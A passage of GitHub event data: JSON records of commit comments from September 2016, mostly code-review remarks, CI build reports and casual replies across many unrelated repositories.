{"id":"4625350131","type":"CommitCommentEvent","actor":{"login":"miratcan"},"repo":{"name":"aligundogdu/safranCli"},"payload":{"comment":{"id":19193508,"position":null,"line":null,"path":null,"commit_id":"5c6c59db6f2f069e8fdbd8e0cc2467ceae86e52f","created_at":"2016-09-27T16:24:46Z","updated_at":"2016-09-27T16:24:46Z","body":"Bu committe biraz ihanet kokusu var"}},"created_at":"2016-09-27T16:24:46Z"}
{"id":"4625351010","type":"CommitCommentEvent","actor":{"login":"markhamstra"},"repo":{"name":"markhamstra/spark"},"payload":{"comment":{"id":19193509,"position":54,"line":1279,"path":"core/src/main/scala/org/apache/spark/scheduler/DAGScheduler.scala","commit_id":"368f82d9789ec04565af835e7cb80d1cdb0ccf0c","created_at":"2016-09-27T16:24:56Z","updated_at":"2016-09-27T16:24:56Z","body":"Yup, that's what I'm thinking."}},"created_at":"2016-09-27T16:24:56Z"}
{"id":"4625353479","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193515,"position":6,"line":6,"path":"src/Terminal.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:25:21Z","updated_at":"2016-09-27T16:25:21Z","body":"Такая сигнатура раскрывает внутренности терминала. Раз есть ServerMaintenanceWork, то значит есть сам сервер. А это пользователям интерфейса знать не нужно."}},"created_at":"2016-09-27T16:25:21Z"}
{"id":"4625354240","type":"CommitCommentEvent","actor":{"login":"bladika"},"repo":{"name":"coryjfowler/MCP_CAN_lib"},"payload":{"comment":{"id":19193516,"position":null,"line":null,"path":null,"commit_id":"14db2dcafc24f00b467c4e139bfa22d875a11c90","created_at":"2016-09-27T16:25:29Z","updated_at":"2016-09-27T16:25:29Z","body":"Hi,\r\nthanks for the quick reaction, I really appreciate . I will give a try soon. "}},"created_at":"2016-09-27T16:25:29Z"}
{"id":"4625354322","type":"CommitCommentEvent","actor":{"login":"Smartykid100"},"repo":{"name":"Smartykid100/First-Game"},"payload":{"comment":{"id":19193517,"position":1,"line":1,"path":"README.md","commit_id":"7ccc596faca92ec3cc48bfba1a8b9dcbe924af8a","created_at":"2016-09-27T16:25:30Z","updated_at":"2016-09-27T16:25:30Z","body":";foward1\r\n"}},"created_at":"2016-09-27T16:25:30Z"}
{"id":"4625354576","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19193519,"position":38,"line":164,"path":"resources/qml/MonitorButton.qml","commit_id":"f4d13713a2206df714fbe6c0ed5dac070711ba15","created_at":"2016-09-27T16:25:32Z","updated_at":"2016-09-27T16:25:32Z","body":"Sure, but in all the other cases we first check printerConnected, which is shorthand for checking if Cura.MachineManager.printerOutputDevices has at least one item.\r\n```if(!printerConnected) return false```"}},"created_at":"2016-09-27T16:25:32Z"}
{"id":"4625354724","type":"CommitCommentEvent","actor":{"login":"microsoftsam"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19193521,"position":4,"line":70,"path":"webapp/public/index.html","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T16:25:34Z","updated_at":"2016-09-27T16:25:34Z","body":"blocklyloader calls pxt.runner, figured that meant pxtblocks would have a dependency on pxtrunner. Is that correct?"}},"created_at":"2016-09-27T16:25:34Z"}
{"id":"4625356827","type":"CommitCommentEvent","actor":{"login":"NilsRethmeier"},"repo":{"name":"pilehvar/deconf"},"payload":{"comment":{"id":19193527,"position":26,"line":25,"path":"README.md","commit_id":"00a98619d1513cb4ad765847a4e84a1a95c3a5fd","created_at":"2016-09-27T16:25:55Z","updated_at":"2016-09-27T16:25:55Z","body":"Proposed Fix :)\r\n\r\nhttp://mws-02485.mws3.csx.cam.ac.uk/DeConf/sense_key_map.txt"}},"created_at":"2016-09-27T16:25:55Z"}
{"id":"4625356930","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19193528,"position":68,"line":68,"path":"api/labs/easyrtc_recorder.js","commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T16:25:56Z","updated_at":"2016-09-27T16:25:56Z","body":"\"video/webm\" should be handled with a default minetype arg to \"video/webm\" to allow other minetype. @EricDavies "}},"created_at":"2016-09-27T16:25:56Z"}
{"id":"4625360266","type":"CommitCommentEvent","actor":{"login":"NilsRethmeier"},"repo":{"name":"pilehvar/deconf"},"payload":{"comment":{"id":19193536,"position":28,"line":27,"path":"README.md","commit_id":"00a98619d1513cb4ad765847a4e84a1a95c3a5fd","created_at":"2016-09-27T16:26:32Z","updated_at":"2016-09-27T16:26:32Z","body":":)\r\nhttp://mws-02485.mws3.csx.cam.ac.uk/DeConf/sense_list.txt "}},"created_at":"2016-09-27T16:26:32Z"}
{"id":"4625360436","type":"CommitCommentEvent","actor":{"login":"manevich"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":19193537,"position":25,"line":87,"path":"src/firejail/sandbox.c","commit_id":"ae0e5b667d7756f5a4e318c37aefb0a827abbf25","created_at":"2016-09-27T16:26:34Z","updated_at":"2016-09-27T16:26:34Z","body":"I think `flush_stdin()` should be placed before `kill()` calls."}},"created_at":"2016-09-27T16:26:34Z"}
{"id":"4625360908","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19193541,"position":null,"line":null,"path":null,"commit_id":"5e5fe37a7ef2a76d7bd59250a7702af052a03d20","created_at":"2016-09-27T16:26:39Z","updated_at":"2016-09-27T16:26:39Z","body":"Oprah Winfrey show reference ftw! 😄"}},"created_at":"2016-09-27T16:26:39Z"}
{"id":"4625365454","type":"CommitCommentEvent","actor":{"login":"Wraul"},"repo":{"name":"volumio/Build"},"payload":{"comment":{"id":19193557,"position":null,"line":null,"path":null,"commit_id":"5409190efbfacefe0c21b95a48b268921cc45516","created_at":"2016-09-27T16:27:26Z","updated_at":"2016-09-27T16:27:26Z","body":"I'm not familiar with how the upgrades work.\r\nBut I understand now that the way I did the implementation might not work when upgrading.\r\n\r\nThe desired behaviour for the SSH keys is as follows.\r\n- Don't ship the image with any keys. This way it's impossible use them by accident.\r\n- Each devices generates unique keys on the first boot.\r\n- The generated keys should survive things like reboots and upgrades without getting regenerated.\r\n\r\nIn hindsight I should likely have done the implementation like this.\r\n- Remove the keys from the image.\r\n- Add some form of script that runs on each boot. The script should check if the host keys exists and generate them if they don't."}},"created_at":"2016-09-27T16:27:26Z"}
{"id":"4625365776","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193558,"position":16,"line":16,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:27:29Z","updated_at":"2016-09-27T16:27:29Z","body":"Синглтон сейчас часто называют антипаттерном. Тому есть веские основания. Будет занятие по юнит-тестированию + про паттерны. На них поговорим об этом."}},"created_at":"2016-09-27T16:27:29Z"}
{"id":"4625366850","type":"CommitCommentEvent","actor":{"login":"microsoftsam"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19193562,"position":68,"line":344,"path":"webapp/src/blocks.tsx","commit_id":"e5b8633c8669360487bcfb0f73829e47d1cf2d71","created_at":"2016-09-27T16:27:40Z","updated_at":"2016-09-27T16:27:40Z","body":"In order to decompile the blocks. "}},"created_at":"2016-09-27T16:27:40Z"}
{"id":"4625368382","type":"CommitCommentEvent","actor":{"login":"timothy-king"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19193565,"position":null,"line":null,"path":null,"commit_id":"f5ccf00833045487f75d2e241ea6b428f7da5dc2","created_at":"2016-09-27T16:27:57Z","updated_at":"2016-09-27T16:27:57Z","body":"My bad. I noticed this last night, but I forgot to push. I've pushed a revert for that part. Thanks for pointing this out."}},"created_at":"2016-09-27T16:27:57Z"}
{"id":"4625370258","type":"CommitCommentEvent","actor":{"login":"glennpratt"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":19193568,"position":19,"line":142,"path":"build-ps/debian/percona-server-server-5.6.postinst","commit_id":"bf2e9068f8269fb32d2c36918bc067b383b6d950","created_at":"2016-09-27T16:28:17Z","updated_at":"2016-09-27T16:28:17Z","body":"Thanks!"}},"created_at":"2016-09-27T16:28:17Z"}
{"id":"4625370376","type":"CommitCommentEvent","actor":{"login":"Snedr"},"repo":{"name":"frdmn/servant-cli"},"payload":{"comment":{"id":19193570,"position":null,"line":null,"path":null,"commit_id":"67e8c94cdc67e2f6e4d7fb6b3307eba75849b692","created_at":"2016-09-27T16:28:18Z","updated_at":"2016-09-27T16:28:18Z","body":"😎"}},"created_at":"2016-09-27T16:28:18Z"}
{"id":"4625373372","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19193577,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-27T16:28:48Z","updated_at":"2016-09-27T16:28:48Z","body":"Good idea, thanks"}},"created_at":"2016-09-27T16:28:48Z"}
{"id":"4625375246","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193580,"position":66,"line":66,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:29:08Z","updated_at":"2016-09-27T16:29:08Z","body":"Дублирование - самое злейшее из всех зол. accounts.get(ownerId) повторился очень много раз"}},"created_at":"2016-09-27T16:29:08Z"}
{"id":"4625376330","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19193582,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T16:29:19Z","updated_at":"2016-09-27T16:29:19Z","body":"this should be fixed now. thanks for noticing."}},"created_at":"2016-09-27T16:29:19Z"}
{"id":"4625377230","type":"CommitCommentEvent","actor":{"login":"lopezdp"},"repo":{"name":"jalbertbowden/open-library"},"payload":{"comment":{"id":19193583,"position":null,"line":null,"path":null,"commit_id":"e94fb252b907a85d02bb0641d3f0980be1f0972e","created_at":"2016-09-27T16:29:29Z","updated_at":"2016-09-27T16:29:29Z","body":"what you working on here? looks interesting. Where you going with it and how can i help?"}},"created_at":"2016-09-27T16:29:29Z"}
{"id":"4625378822","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19193586,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T16:29:46Z","updated_at":"2016-09-27T16:29:46Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1789 of 1789 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T16:29:46Z"}
{"id":"4625380234","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19193594,"position":null,"line":null,"path":null,"commit_id":"e10d813c627cbb7a00e016ff19a4017facb0c086","created_at":"2016-09-27T16:30:01Z","updated_at":"2016-09-27T16:30:01Z","body":"deployed!"}},"created_at":"2016-09-27T16:30:01Z"}
{"id":"4625381070","type":"CommitCommentEvent","actor":{"login":"Brickworth"},"repo":{"name":"Brickworth/Lab3"},"payload":{"comment":{"id":19193596,"position":null,"line":null,"path":null,"commit_id":"e135e827e4476155112676706f672a8b16e8c9a0","created_at":"2016-09-27T16:30:09Z","updated_at":"2016-09-27T16:30:09Z","body":"Wow, great job me."}},"created_at":"2016-09-27T16:30:09Z"}
{"id":"4625382027","type":"CommitCommentEvent","actor":{"login":"timburrow"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19193599,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T16:30:17Z","updated_at":"2016-09-27T16:30:17Z","body":"good catch. I thought it looked wrong... I'll fix."}},"created_at":"2016-09-27T16:30:17Z"}
{"id":"4625384108","type":"CommitCommentEvent","actor":{"login":"Brickworth"},"repo":{"name":"Brickworth/Lab3"},"payload":{"comment":{"id":19193605,"position":null,"line":null,"path":null,"commit_id":"e135e827e4476155112676706f672a8b16e8c9a0","created_at":"2016-09-27T16:30:38Z","updated_at":"2016-09-27T16:30:38Z","body":"Even managed to screw up the description of the commit."}},"created_at":"2016-09-27T16:30:38Z"}
{"id":"4625384785","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19193607,"position":null,"line":null,"path":null,"commit_id":"f41b7cd64f510da8897f6929224314bb5b0140df","created_at":"2016-09-27T16:30:46Z","updated_at":"2016-09-27T16:30:46Z","body":"and yet another fail\r\n"}},"created_at":"2016-09-27T16:30:46Z"}
{"id":"4625385635","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193611,"position":69,"line":69,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:30:55Z","updated_at":"2016-09-27T16:30:55Z","body":"Часто в случаях блокировки хранят не время начала блокировки, а время окончания - это избавит от таких частых математических операциях."}},"created_at":"2016-09-27T16:30:55Z"}
{"id":"4625385672","type":"CommitCommentEvent","actor":{"login":"freeatnet"},"repo":{"name":"cssu/isthereamicrowaveinthe"},"payload":{"comment":{"id":19193612,"position":null,"line":null,"path":null,"commit_id":"6e6f0c13900cb68da9e836309f95f87eecc6cc71","created_at":"2016-09-27T16:30:55Z","updated_at":"2016-09-27T16:30:55Z","body":"Oh well. https://github.com/freeatnet/isthereamicrowaveinthe/commit/4d178bf6330ffe8fae1b04889cc3f6bc6727a447"}},"created_at":"2016-09-27T16:30:55Z"}
{"id":"4625387552","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19193615,"position":null,"line":null,"path":null,"commit_id":"51b5efe28b96f93952069aeaca6318e8096f1308","created_at":"2016-09-27T16:31:16Z","updated_at":"2016-09-27T16:31:16Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.268.51b5efe28b96f93952069aeaca6318e8096f1308](http://build.palaso.org/viewLog.html?buildId=77154&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1498, ignored: 17 Build time: 00:08:28"}},"created_at":"2016-09-27T16:31:16Z"}
{"id":"4625390219","type":"CommitCommentEvent","actor":{"login":"ashl1"},"repo":{"name":"oliviertassinari/react-swipeable-views"},"payload":{"comment":{"id":19193620,"position":null,"line":null,"path":null,"commit_id":"85bdf1e47573463302cae4243684ade6db6d5aa0","created_at":"2016-09-27T16:31:44Z","updated_at":"2016-09-27T16:31:44Z","body":"Excuse me, I just want to know when this update will be available in [demos](http://oliviertassinari.github.io/react-swipeable-views/) page?"}},"created_at":"2016-09-27T16:31:44Z"}
{"id":"4625391728","type":"CommitCommentEvent","actor":{"login":"JasonScourge"},"repo":{"name":"CS2103AUG2016-W09-C4/addressbook-level3"},"payload":{"comment":{"id":19193629,"position":null,"line":null,"path":null,"commit_id":"ad0153b529f363e8a52fd4d9c7a0f45df40acb32","created_at":"2016-09-27T16:32:00Z","updated_at":"2016-09-27T16:32:00Z","body":"Deleted add_findsubset_command branch after merging and resolving all the conflicts "}},"created_at":"2016-09-27T16:32:00Z"}
{"id":"4625393040","type":"CommitCommentEvent","actor":{"login":"terrillmoore"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19193635,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T16:32:12Z","updated_at":"2016-09-27T16:32:12Z","body":"Another way to put my point: if the code ever works for registering on sb2 *without* my optimization, it will work on sb2 *with* my optimization. The only way to get an infinite loop would be if it would (in practice) never try an sb2 channel again.  I’m simply skipping the steps that we know won’t work, without powering up tx or rx. So the code is exactly as correct now as it was before, just lower power.\n\n \n\n--Terry\n\n \n\nFrom: Frank Leon Rose [mailto:notifications@github.com] \nSent: Tuesday, September 27, 2016 11:11\nTo: things-nyc/arduino-lmic <arduino-lmic@noreply.github.com>\nCc: Terry Moore <tmm@mcci.com>; Mention <mention@noreply.github.com>\nSubject: Re: [things-nyc/arduino-lmic] Honor the channel mask while trying to join the network. (40e9651)\n\n \n\nWay before transmit or FCC, I'm just talking about the algorithm for picking at random an enabled channel. Neither strategy we have in the code is great, but I haven't come up with anything better.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/things-nyc/arduino-lmic/commit/40e96518686393932ae3ee73aa7c06ee9af993d6#commitcomment-19193273> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ASb_7xcwd1gO1IRkXuwUUmNCefzP1lwqks5quUAdgaJpZM4KH0Ec> .\n\n"}},"created_at":"2016-09-27T16:32:12Z"}
{"id":"4625394767","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193645,"position":123,"line":123,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:32:30Z","updated_at":"2016-09-27T16:32:30Z","body":"Состояние счёта не совсем атрибут счёта. Скорее должен быть сервис получения состояния по счёту."}},"created_at":"2016-09-27T16:32:30Z"}
{"id":"4625394782","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19193644,"position":null,"line":null,"path":null,"commit_id":"f040685b0cbec18feb981fdad96389a3b28b676d","created_at":"2016-09-27T16:32:30Z","updated_at":"2016-09-27T16:32:30Z","body":"Great, thanks!"}},"created_at":"2016-09-27T16:32:30Z"}
{"id":"4625395936","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19193647,"position":null,"line":null,"path":null,"commit_id":"8ada781ee45c824c6eff6353fccde5a4a34b93e0","created_at":"2016-09-27T16:32:42Z","updated_at":"2016-09-27T16:32:42Z","body":"PrepFor86Release (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T16:32:42Z"}
{"id":"4625397952","type":"CommitCommentEvent","actor":{"login":"boneskull"},"repo":{"name":"JetBrains/mocha-intellij"},"payload":{"comment":{"id":19193653,"position":null,"line":null,"path":null,"commit_id":"8cd529aea343a001ab555571b883d63e5556ef83","created_at":"2016-09-27T16:33:03Z","updated_at":"2016-09-27T16:33:03Z","body":"Do we need the checks? Is it possible to just call `stringifier.stringify()` in all cases?  Or maybe not for backwards compatibility?"}},"created_at":"2016-09-27T16:33:03Z"}
{"id":"4625401173","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193660,"position":159,"line":511,"path":"src/couch_bt_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:33:37Z","updated_at":"2016-09-27T16:33:37Z","body":"You should move this down below to just above finish_compaction_int."}},"created_at":"2016-09-27T16:33:37Z"}
{"id":"4625401401","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19193662,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T16:33:39Z","updated_at":"2016-09-27T16:33:39Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-27T16:33:39Z"}
{"id":"4625403554","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19193670,"position":29,"line":32,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-27T16:34:02Z","updated_at":"2016-09-27T16:34:02Z","body":"Test commit"}},"created_at":"2016-09-27T16:34:02Z"}
{"id":"4625404864","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19193674,"position":29,"line":32,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-27T16:34:15Z","updated_at":"2016-09-27T16:34:15Z","body":"Really long reply. Really long reply."}},"created_at":"2016-09-27T16:34:15Z"}
{"id":"4625405546","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193675,"position":258,"line":1000,"path":"src/couch_bt_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:34:22Z","updated_at":"2016-09-27T16:34:22Z","body":"You should clarify that fold_purged_docs throws the exception if CompactPurgeSeq is too old. I kept looking for a throw here for a few minutes before I remembered that behavior."}},"created_at":"2016-09-27T16:34:22Z"}
{"id":"4625405636","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19193676,"position":36,"line":39,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-27T16:34:23Z","updated_at":"2016-09-27T16:34:23Z","body":"Another commit."}},"created_at":"2016-09-27T16:34:23Z"}
{"id":"4625406917","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193681,"position":130,"line":130,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:34:37Z","updated_at":"2016-09-27T16:34:37Z","body":"Ни в коем случае нельзя обращаться к значениям values enum'а по индексу в таких случаях. Почему не передать сразу значение enum'а&"}},"created_at":"2016-09-27T16:34:37Z"}
{"id":"4625407666","type":"CommitCommentEvent","actor":{"login":"mborgescc"},"repo":{"name":"mborgescc/Code-Repository"},"payload":{"comment":{"id":19193684,"position":null,"line":null,"path":null,"commit_id":"7e5068ae30ac4a3ec2bca5fd8a0a41c1d5a5f813","created_at":"2016-09-27T16:34:45Z","updated_at":"2016-09-27T16:34:45Z","body":"\"Actualize\""}},"created_at":"2016-09-27T16:34:45Z"}
{"id":"4625411730","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193686,"position":142,"line":142,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:35:29Z","updated_at":"2016-09-27T16:35:29Z","body":"Тоже - время блокировки не совсем атрибут счёта.\r\n+ даже если это так, то он должен быть приватным."}},"created_at":"2016-09-27T16:35:29Z"}
{"id":"4625414645","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193698,"position":183,"line":183,"path":"src/TerminalServer.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:35:59Z","updated_at":"2016-09-27T16:35:59Z","body":"Такой enum нужно вынести в отдельный файл."}},"created_at":"2016-09-27T16:35:59Z"}
{"id":"4625416689","type":"CommitCommentEvent","actor":{"login":"Deamon5550"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19193706,"position":62,"line":77,"path":"src/main/java/org/spongepowered/api/event/cause/Cause.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T16:36:21Z","updated_at":"2016-09-27T16:36:21Z","body":"Especially for plugins if you're just pushing a few vars in its a lot easier to use the varargs than the builder."}},"created_at":"2016-09-27T16:36:21Z"}
{"id":"4625421874","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193725,"position":18,"line":300,"path":"src/couch_db_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:37:17Z","updated_at":"2016-09-27T16:37:17Z","body":"Nit: \"should be considered:\", followed doesn't seem right. Also newline before the numbered list."}},"created_at":"2016-09-27T16:37:17Z"}
{"id":"4625421984","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19193726,"position":8,"line":113,"path":"chat-plugins/roomsettings.js","commit_id":"b9e33af1c071b2620d517f1b917986107be15bd0","created_at":"2016-09-27T16:37:18Z","updated_at":"2016-09-27T16:37:18Z","body":"Should of updated this line and the one two below it as well"}},"created_at":"2016-09-27T16:37:18Z"}
{"id":"4625425043","type":"CommitCommentEvent","actor":{"login":"TheImmortal"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19193735,"position":8,"line":113,"path":"chat-plugins/roomsettings.js","commit_id":"b9e33af1c071b2620d517f1b917986107be15bd0","created_at":"2016-09-27T16:37:50Z","updated_at":"2016-09-27T16:37:50Z","body":"shit didn't notice there was another "}},"created_at":"2016-09-27T16:37:50Z"}
{"id":"4625425795","type":"CommitCommentEvent","actor":{"login":"Tresna270297"},"repo":{"name":"Tresna270297/Data-Communication"},"payload":{"comment":{"id":19193738,"position":1,"line":1,"path":"README.md","commit_id":"7d68583120b07875719d9e5b2eddef0cabbc83ab","created_at":"2016-09-27T16:37:59Z","updated_at":"2016-09-27T16:37:59Z","body":"First assignment_L200154008\r\n[Tugas Pak Bana word.docx](https://github.com/Tresna270297/Data-Communication/files/496120/Tugas.Pak.Bana.word.docx)\r\n"}},"created_at":"2016-09-27T16:37:59Z"}
{"id":"4625426681","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19193740,"position":null,"line":null,"path":null,"commit_id":"c8bfc7355ac2aa921e1d195233fb67ef84ec0e71","created_at":"2016-09-27T16:38:09Z","updated_at":"2016-09-27T16:38:09Z","body":"\r\n![7k manage profile grey](https://cloud.githubusercontent.com/assets/19476407/18882924/ce56196e-8513-11e6-95e2-96d2cf860ff8.jpg)\r\n\r\n[12:32:44 AM]  Scene: Adventure Fight\r\n[12:32:46 AM]  @ Wave 1\r\n[12:33:05 AM]  @ Wave 2\r\n[12:33:17 AM]  @ Wave 3\r\n[12:33:48 AM]  Scene: Victory\r\n[12:33:50 AM]  Scene: Adventure Loot\r\n[12:33:51 AM]  Limit reached [Adventure]\r\n[12:33:51 AM]  Changing objective to: Gold Chamber\r\n[12:33:53 AM]  Scene: Level 30 Max Dialog\r\n[12:33:53 AM]  Hero Level 30\r\n[12:33:53 AM]  Max Heroes  level up per day : 100/100\r\n[12:33:53 AM]  Changing objective to: Hero Management\r\n[12:33:54 AM]  Scene: Lobby\r\n[12:33:55 AM]  Scene: Heroes\r\n[12:33:56 AM]  Start managing heroes\r\n[12:33:57 AM]  Checking each position for level 30...\r\n[12:33:59 AM]  - Got position: 4\r\n[12:34:03 AM]  Finding heroes...\r\n[12:34:04 AM]  No more heroes less than level 30\r\n[12:34:10 AM]  Replaced hero position: 4\r\n[12:34:10 AM]  Done managing heroes\r\n[12:34:10 AM]  Changing objective to: Gold Chamber\r\n[12:34:11 AM]  Scene: Lobby\r\n[12:34:12 AM]  Scene: Adventure Modes\r\n[12:34:13 AM]  Scene: Tower Select\r\n[12:34:14 AM]  Scene: Tower Start\r\n[12:34:16 AM]  Scene: Tower Fight\r\n[12:34:18 AM]  @ Wave 1\r\n[12:34:37 AM]  @ Wave 2\r\n[12:35:05 AM]  Scene: Victory\r\n[12:35:09 AM]  Scene: Gold Chamber Loot\r\n[12:35:12 AM]  Scene: Tower Start\r\n[12:35:12 AM]  Changing objective to: Arena\r\n[12:35:13 AM]  Scene: Tower Select\r\n[12:35:14 AM]  